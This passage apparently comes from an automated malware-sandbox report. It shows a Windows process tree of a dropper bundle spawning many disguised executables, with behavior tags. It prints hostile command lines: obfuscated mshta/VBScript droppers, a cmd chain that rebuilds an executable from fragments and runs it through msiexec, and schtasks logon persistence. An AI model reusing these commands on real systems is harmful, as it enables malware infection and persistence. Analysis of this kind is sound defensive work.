                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5452
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:5512
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:5772
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:6544
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:6072
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:6112
                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:5728
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:4620
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                6⤵
                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                PID:7056
                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:7284
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:4416
                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                      7⤵
                                                                                                                                                                                        PID:4668
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:4552
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:7692
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:8432
                                                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                  msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  PID:8128
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:3996
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4708
                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:8172
                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:6836
                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                            PID:8184
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:7552
                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:7424
                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:8532
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:6348
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\8.exe"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:5916
                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 5916 -s 1532
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                PID:4108
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05f84fa77402bf.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05f84fa77402bf.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4900
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri051e1e7444.exe
                                                                                                                                                                                            Fri051e1e7444.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:4152
                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\39ZXQa5oCLwT8j6QVmh6fpUq.exe
                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\39ZXQa5oCLwT8j6QVmh6fpUq.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:5840
                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\SfaHfUSSAeqgP9m4egp7CnQ0.exe
                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\SfaHfUSSAeqgP9m4egp7CnQ0.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                PID:6336
                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\hw3z8DDe5zJyTDE2ky9GCqX9.exe
                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\hw3z8DDe5zJyTDE2ky9GCqX9.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:6412
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\hw3z8DDe5zJyTDE2ky9GCqX9.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\hw3z8DDe5zJyTDE2ky9GCqX9.exe"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3084
                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\hSoPwAVm_H_UiMm21MNTwBwC.exe
                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\hSoPwAVm_H_UiMm21MNTwBwC.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:6744
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                      PID:7240
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7240 -s 1004
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                        PID:8260
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\mMeHHXCxwZc4ty2mkZvsoz4N.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\mMeHHXCxwZc4ty2mkZvsoz4N.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:6836
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\mMeHHXCxwZc4ty2mkZvsoz4N.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\mMeHHXCxwZc4ty2mkZvsoz4N.exe"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4588
                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\MHuNXGnb90wUDhte0oMkDM5O.exe
                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\MHuNXGnb90wUDhte0oMkDM5O.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:6312
                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\qR3Uf1GPU8S5h1gR_Vae2ZeO.exe
                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\qR3Uf1GPU8S5h1gR_Vae2ZeO.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                          PID:6264
                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\7IxSvw4jsZCavuFB2jUzBAdK.exe
                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\7IxSvw4jsZCavuFB2jUzBAdK.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                          PID:6252
                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\7IxSvw4jsZCavuFB2jUzBAdK.exe
                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\7IxSvw4jsZCavuFB2jUzBAdK.exe"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:7316
                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\wLbJdD5QQq0knQ84VB8psLmX.exe
                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\wLbJdD5QQq0knQ84VB8psLmX.exe"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:6240
                                                                                                                                                                                                              • C:\Users\Admin\Documents\wQtmlWBtshJUL_nJcJd4dVAX.exe
                                                                                                                                                                                                                "C:\Users\Admin\Documents\wQtmlWBtshJUL_nJcJd4dVAX.exe"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                PID:6032
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\7b6p2dkWYR5p1atymNtWetB1.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\7b6p2dkWYR5p1atymNtWetB1.exe"
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:2652
                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\2Xphq6bWt8mG45knLdRgpdVo.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\2Xphq6bWt8mG45knLdRgpdVo.exe"
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:7260
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\2Xphq6bWt8mG45knLdRgpdVo.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\2Xphq6bWt8mG45knLdRgpdVo.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:9112
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\2Xphq6bWt8mG45knLdRgpdVo.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\2Xphq6bWt8mG45knLdRgpdVo.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:4592
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                              taskkill -f -iM "2Xphq6bWt8mG45knLdRgpdVo.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                              PID:8840
                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\rZXv9Z1FLOHioVY4JtZ8UYTI.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\rZXv9Z1FLOHioVY4JtZ8UYTI.exe" /mixtwo
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:1468
                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\5JIkFUAf5NFIcwiodhk1wF5B.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\5JIkFUAf5NFIcwiodhk1wF5B.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                          PID:8460
                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\6YDFF4lg0ZQqIMWCaQRwj7E0.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\6YDFF4lg0ZQqIMWCaQRwj7E0.exe"
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:7448
                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\17ubni9KsNMxOQn2PRlnQiha.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\17ubni9KsNMxOQn2PRlnQiha.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                            PID:8648
                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\IcPFKnQ3IBD1yhJYcuvC9H1T.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\IcPFKnQ3IBD1yhJYcuvC9H1T.exe"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                            PID:4384
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-EB9O8.tmp\IcPFKnQ3IBD1yhJYcuvC9H1T.tmp
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-EB9O8.tmp\IcPFKnQ3IBD1yhJYcuvC9H1T.tmp" /SL5="$505E2,506127,422400,C:\Users\Admin\Pictures\Adobe Films\IcPFKnQ3IBD1yhJYcuvC9H1T.exe"
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                              PID:7464
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-EVCON.tmp\DYbALA.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-EVCON.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                PID:9012
                                                                                                                                                                                                                                • C:\Program Files\Reference Assemblies\WICYFYIOAM\foldershare.exe
                                                                                                                                                                                                                                  "C:\Program Files\Reference Assemblies\WICYFYIOAM\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:4452
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\91-dc88b-51e-531af-5988da1e4ccb3\Jaegavydashy.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\91-dc88b-51e-531af-5988da1e4ccb3\Jaegavydashy.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                                    PID:6960
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\72-6f62f-56b-14ebf-d39147f20a1e1\Parigaevezha.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\72-6f62f-56b-14ebf-d39147f20a1e1\Parigaevezha.exe"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:2432
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fa00pk1y.h3i\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:6488
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\fa00pk1y.h3i\setting.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\fa00pk1y.h3i\setting.exe SID=778 CID=778 SILENT=1 /quiet
                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                              PID:5948
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\be3gtopi.ezg\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:7236
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\be3gtopi.ezg\GcleanerEU.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\be3gtopi.ezg\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                  PID:8300
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hexxuhf3.4h2\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:5936
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\hexxuhf3.4h2\installer.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\hexxuhf3.4h2\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                      PID:9844
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0lqnf00.z5y\any.exe & exit
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                      PID:8732
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\t0lqnf00.z5y\any.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\t0lqnf00.z5y\any.exe
                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                        PID:10072
                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kafd42fj.tev\customer51.exe & exit
                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                        PID:9348
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\kafd42fj.tev\customer51.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\kafd42fj.tev\customer51.exe
                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                          PID:4616
                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wlpnscqm.0uq\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:9544
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\wlpnscqm.0uq\gcleaner.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\wlpnscqm.0uq\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                              PID:9536
                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\un0kwtd5.b1u\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                              PID:9748
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\un0kwtd5.b1u\autosubplayer.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\un0kwtd5.b1u\autosubplayer.exe /S
                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:8912
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy4C80.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                    PID:7112
                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5n20nbab.ztg\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:10172
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5n20nbab.ztg\installer.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\5n20nbab.ztg\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                      PID:4444
                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\h39qNCUSk5VLVf1QelAevbic.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\h39qNCUSk5VLVf1QelAevbic.exe"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                            PID:7084
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                              PID:9088
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                PID:9984
